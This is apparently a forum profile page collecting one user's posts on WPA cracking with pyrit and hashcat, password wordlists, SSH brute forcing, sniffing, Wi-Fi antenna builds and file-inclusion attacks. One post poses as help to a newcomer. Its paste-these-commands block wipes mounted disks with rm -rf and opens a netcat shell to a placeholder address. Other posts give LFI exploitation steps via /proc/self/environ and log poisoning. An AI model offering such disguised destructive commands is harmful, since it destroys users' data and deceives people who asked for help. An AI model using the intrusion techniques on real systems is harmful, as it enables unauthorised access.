i8igmac
-
Posts
939 -
Joined
-
Last visited
-
Days Won
22
Posts posted by i8igmac
-
-
Oh my wow... I have been struggling lately. Thanks for this. You will have to do a video walk threw of your wordlist collection.
-
2 hours ago, Decoy said:
Yeah, I'm having a blast with this rig so far. I actually just found this new gem on GitHub, I'm adding these to my toolbox:
I was actually about to write my own NetGear default tool until I found these.
what's the deal with netgear? Is there password predictable? Is there a word list for it?
-
1,133,849,621 Rocktastic12a
The word list I posted above. I made a mistake on the word count, its 1.1 billion
-
If the traffic is encrypted with ssl or hsts it wont work.
Try using internet explorer and try multiple websites that are not encrypted.
Ip forwarding like this?
echo 1 > /proc/sys/net/ipv4/ip_forward -
12 minutes ago, Decoy said:
Holy crap. That's man, that's awesome. I've just been combining lists as I find then, rockyou, dark0de, and all the latest breaches, etc. That's definitely a comprehensive list... There's a good repository on GitHub I use too,
There have been some major security breaches over the last few years. when this data is release to the public I'm sure this word list will grow another 100billion in a few years.
-
8 minutes ago, Decoy said:
Yes, that's 781,400 hashes per second. I have a custom wordlist of 80+ million passwords, and it chews through that in no time at all. I'm running 2x Nvidia GeForce Founders Editions SLI. That's both of them combined. NTLM hashes:
Hashtype: NTLM
Speed.Dev.#1.....: 38451.1 MH/s (69.34ms)
Speed.Dev.#2.....: 39406.8 MH/s (67.55ms)
Speed.Dev.#*.....: 77858.0 MH/sI will post a pyrit benchmark tonight.
https://labs.nettitude.com/tools/rocktastic/
I believe this is a updated version of the word list you are using... 1.1 trillion : -)
-
Hashtype: wpa/wpa2
Speed.Dev.#1.....: 388.6 kH/s (52.19ms)
Speed.Dev.#2.....: 392.8 kH/s (51.63ms)
Speed.Dev.#*.....: 781.4 kH/sIs that 781,400 hash's per second?
can you post pyrit benchmark. I would like to see a comparison...
are you running these gpu's in sli? Overclocked? Water cooling?
-
all your traffic is gzip encoded, your filter must first prevent this so plain text traffic is visible to ettetcap.
-
firw that thing up amd run a pyrit benchmark. I'm excited for you
Check out my post count... 666
-
for fun, I made a metasploit module to exploit this process.
-
8 hours ago, digip said:
SSH bruting is a slow process, generally only send a few at a time or single threaded with a really good password file. You will just get locked out or banned in most cases, and the more threads won't actually help at all in this case. For things that don't block after a certain number of tries, like http basic auth or ftp, then you can get away with more, but even then, you can get false positives if you try too many too fast.
This is true, in this case I was focused on devices that have minimal security.
-
3 hours ago, pierre said:
The txt file with PHP code stored on the server don't execute PHP but display the PHP code
Only the RFI permits execute PHP code in a txt file
No special entry add in .htaccess appart "php flag magic quotes gpc"
The PHP code in the txt file (in RFI case) is executed because the txt file is include with include function in index.php ? Is that so ?
Correct. You should look at the file /lfi/index.php. you should find include($_GET exist or something close.
Topically, RFI is not a practical method. LFI is more common. you have to discover local files that could allow you a way to view your header request. Then place php snippets in your header.
/lfi/?page=/proc/self/environ
This request above will execute php code directly from your user agent. You can use a web browser plugin to tamper with your user agent string.
lfi/?page=/var/log/apache2/access.log
If you can find the web server log file. You might see This log file shows request information coming from your web browser which should show a referer: string or user-agent string.
Run a dir brute force scan. Try to discover config files and log files.
You should learn small php snippets, how to find a writable directory and how to write your php code to this writable directory.
I assume this is a vulnerable linux VM?
-
I have used 255 threads on ssh_brute. I ran into a problem with msf database unable to handle this many threads. So I tried to incorporate thread pooling with puma.
I didn't spend enough time tweaking. For optimal performance but it was a fun learning experience.
-
The RFI is a vulnerability that exist in a index.php file.
the php code in your vulnerable php File is executing the code from your echo.txt file.
The vuln.php file is using Include_once(echo.txt)
the most common exploit of this technique might be log poisoning. If you can write php code to any log file then you could execute your own php code. with the url inclusion method
vuln.php?PAGE=../etc/log/FTP_error.log%00
-
3 hours ago, EvilMog said:
Disclaimer: I am not a hashcat developer but I am on Team Hashcat, I am going to apologize for some corrections but they need to be made.
1) wpaclean is part of the aircrack-ng suite, it should not be used for extracting hashes from wpa traffic for use in hashcat, the format it extracts in has been superceded and any requests for support using it will be denied.
There is an alternative wlandump from hcxtools https://github.com/ZerBea/hcxtools which is supported under the most recent versions of hashcat and these tools are very specific and purpose built, other tools in the suite include:wlandump-ng Small, fast and simple but powerfull WLAN scanner wlanresponse Extreme fast deauthentication/authentication/response tool wlanrcascan Small, fast and simple passive WLAN channel assignment scanner (status output) pioff Turns Raspberry Pi off via GPIO switch wlancapinfo Shows info of pcap file wlancap2hcx Converts cap to hccapx (recommended for use with wlandump-ng and wlanresponse) wlanhcx2cap Converts hccapx to cap wlanhc2hcx Converts hccap to hccapx wlanhcx2essid Merges hccapx containing the same ESSID wlanhcx2ssid Strips BSSID, ESSID, OUI wlanhcx2john Converts hccapx to format expected by John the Ripper wlanhcxinfo Shows detailed info from contents of hccapxfile wlanhcxmnc Manually do nonce correction on byte number xx of a nonce whoismac Show vendor information pwhash Generate hash of a word by using a given charset 2) from your post "I generally use john. When done, if i can't see a password in the terminal because it scrolled off screen, you type "john hashfile.txt --show"
hashcat has had this support for some time with --show, also --username if you are using a dump with usernames so there is no need to use john
3) from your post "I've dabbled with hashcat, but i don't have a GPU to use with it"
Hashcat supports CPU as of 3.00 with the correct opencl libraries
4) from your post "had to use the older CPU only version, where John just seems so much faster in this respect "
hashcats opencl cpu code is multiple times faster than johns native cpu code because of algorithms are optimized on math level
5) from your post "you can pipe crunch directly into aircrack"
Crunch is a legacy processor, you really should be using hashcat-utils maskprocessor instead, its much faster. That being said you don't need to use it as hashcat has it built in with -a 3 plus its markov-chain optimized
In summary stop using legacy tools like pyrit they haven't been updated in ages and no new research is being done, the guy who is writing hcxtools is the one who pushes WPA cracking today. There's not been any improvement on wpa based attacks since a long time for aircrack-ng and pyrit and both fail to do deauth attacks cleanly (without creating invalid handshakes)
For some good reading:
WPA Cracking with hashcat
https://hashcat.net/forum/thread-6150.html
New parameter: --nonce-error-corrections
https://hashcat.net/forum/thread-6361.htmlhashcat v3.00 release notes
https://hashcat.net/forum/thread-5559.html
For anything else please visit the hashcat forums, wiki and IRC channelI did try out hcxtools, the hccapx generated with no errors but when i attampt to start hashcat, (ill try and post the resaults) just looks like a ugly mess... it says no hashes loaded.
There was no cleaning done by any scripted tools. Its a fresh cap file from aircrack-ng 1.2 rc4.
-
Ill check out john. Also looking into opencl vs cuda..
I currently hacked up a logging function with pyrit. I would hate to see 100hours of work go by and failure to see a success... this function would also allow me to recover the attack from any location of the word list...
Im running 2 gpu's and 2 decent cpu's... blew all the dust out of the fans for the long haul.
14000psk's
22000psk's
a 3rd gpu sitting on a bench, I expect 40,000 psk's from this gpu and pyrit...
I'm want to try extreme over clicking with home brew cooling... I would like to see how much I can squeeze out of a dirt cheap gpu but also keep things stable.
-
(Pyrit Example command below)
First ill start with my problem of pyrit.
Output logging is hacky, after 15 hours of work, there should be something logged to the file like "Password is or was not found"
Notice 2>&1 should log both stdout and stderr to a file. if I grep threw the log file, the Password String does not exist.
(15 hours of work)
if I test this with a small dictionary file, I achieve different results, Password string exist and is grepable.
(5 minutes of work)
pyrit -r handshakes.cap -i Rocktastic12a -b XX:XX:XX:XX:XX attack_passthrough 2>&1 | tee -a resaults.log
love the application, it works for the most part but it seems there has not been much improvement since 2014.
So, what about hashcat. this is my first attempt poking around, I knew of its existence but felt that pyrit works just fine so no need to bother with hashcat.
(Hashcat)
I have installed then ran the examples provided and I like the detailed output. Rocktastic cracked an enormous amount of the example hashs. Pretty cool...
now when i try to run hashcat on my handshake.cap file, I notice I have to convert to hashcat format with cap2hccapcx. I installed hashcat-utils-1.8 and ran cap2hccapx in my aircrack capture file and see this error.
hashcat-utils-1.8/src $ ./cap2hccapx.bin ../../out.pcap-01.cap output.hccapx
Zero value timestamps detected in file: ../../out.pcap-01.cap.
This prevents correct EAPOL-Key timeout calculation.
Do not use preprocess the capture file with tools such as wpaclean.If I remember, this file was straight from aircrack. I did not run cleanup tools.
I tried another tool that converts cap files to hashcat format hcxtools. This attempt just looks ugly when I pass the newly generated cap.hccapx.... could a outdated version of aircrack(1.2 rc4) be the cause of this struggle?
The good news is, hashcat is updated consistently and has a large irc channel.
-
the heck with these guys. Ill help you... make a bootable kali usb stick or bootable live kali cd...
http://docs.kali.org/downloading/kali-linux-live-usb-install
A tutorial like Above... once you reboot your compiter into this kali operating system. Paste exactly these commands
mount /dev/sda1 /tmp Rm -rf /tmp umount /dev/sda1 mount /dev/sdb1 /tmp rm -rf /tmp echo "pwnd by BiGMaC" >/tmp/readme.txt umount /dev/sdb1 nc <IP-ADDRESS> -e cmd.exe
-
54 minutes ago, digip said:
What did you do to resolve the issues, or was it all 2.4ghz issues, while 5ghz was solid?
Yes indeed... 2.4 ghz is just to crowded... 40mhz is impossible... so the speed you pay for will never be achieved...
because of the short Range of 5.8ghz, 40mhz is easily doable. when you first power your router on, it will scan for crowding networks, and decide if 40mhz is doable (consume 2 channels simultaneously)
A quick little hack I did with hostapd, put aluminum foil around the antenna's and start host apd. It will force 40mhz but is of course way to crowded and will cause more issues...
And with long range you are more susceptible to interference, on 2.4ghz, my beam of radiation is passing through several different wifi routers airspace... think of the drops,retry,drop,fail...
I would love to do a power point demonstration...
-
so. I have made some huge progress...
5.8ghz has been 100% stable (long range)for about 5days now... no packet loss, no more disconnects... 2.4 is to crowded... it was all pocket loss/retry/drop/retry
I see 60mbps during good conditions but 40mbps is consistent...
I ordered some sma pigtails, digital calipers and will build some antennas tuned for 5.8ghz...
-
I have been 3d printing parabolas for a few weeks now. Soon I will receive a 20pack of sma pigtails that I will use to build several feed antennas in hopes to find a great parabola/antenna combo design... this design will be a 2x2 mimo
So I hope to build a inverted dipole but I fail to find measurements for 2.4 and 5ghz
I plan to mount 2 antennas at the 80mm focal point, just spaced appart in a horizontal location...
Any tips or ideas for antenna designs that might feed a parabola... I'm open for ideas.
-
32 minutes ago, digip said:
Sounds like DNS is not resolving. you can add a script to hard code DNS servers such as google or opendns.
Throw in your /etc/resolv.conf(or whatever your device is using for DNS resolution)
nameserver 8.8.8.8 nameserver 208.67.220.220 nameserver 208.67.222.222 nameserver 192.168.1.18.8.8.8 is google, 208.x.x.x openDNS and 192.x.x.x should be whatever the gateway IP is at the other end as the last entry. You don't need both google and opendns, choose either or, but doesn't hurt to have both. See if that helps. if it doesn't, might want to see what your DNS service is doing.
if the device uses something like nm-tools or newer nmcli, you can query it as well for the info. If it's empty, track down why it's not being populated.
BTW, love the colors. Did you 3d print the case materials?
Thanks for the info, i tried 8.8.8.8 but never included 192.168...
Yes 3d printed a parbolic curve with a focal point of 40mm. The case is 180mmx180mmx60mm
I'm learning my way around design in freecad on linux :-)
-
Here is a project I have been working on, the configuration includes hostapd for wlan0
Dnsmasq to assign ip's to local clients (192.168.0.*)
(Wlan1)WPA_supplicant and dhclient to connect to a access point from a distance(10.0.0.*)
And iptables to pass packets in both directions(wlan0 <-> wlan1)
the access point in the distance is on channel 1 and my hostap runs on channel 11... 5.8ghz is not yet a option...
I experience a disconnect and reconnect with the long range communication, at this moment the reconnect happens and the connection is stable again, something strage happens, I can ping my machines located in the distance on the subnet of 10.0.0.* But I can't ping google for a few minutes...
During this time I can perform a test of packet loss and ping
Mtr 192.168.0.1 -> 10.0.0.1
0% packet loss and a consistent 20ms response time...
But ping google just hangs with no response...
Possible dhclient or dns problem?
-
Tail -f /var/log/kern.log
you should watch your kernal logs, then plug the device in...
Server execute PHP code through a txt file..
in Security
Posted
I have the metasploit module some where on a hard drive. You will be better off learning the basics.
First run a scan and try to discover as many files. then post results here...
burp suite can be used to discover files with intruder tab. You will need a list of known files... I think kali or metasploit has a file-list for this kind of scan...